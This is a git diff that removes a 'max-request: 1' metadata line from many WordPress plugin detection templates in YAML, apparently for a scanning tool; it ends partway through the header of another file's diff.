diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 41baa25eb7..dc3d446af3 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index ee389af6ec..96b4699d2d 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
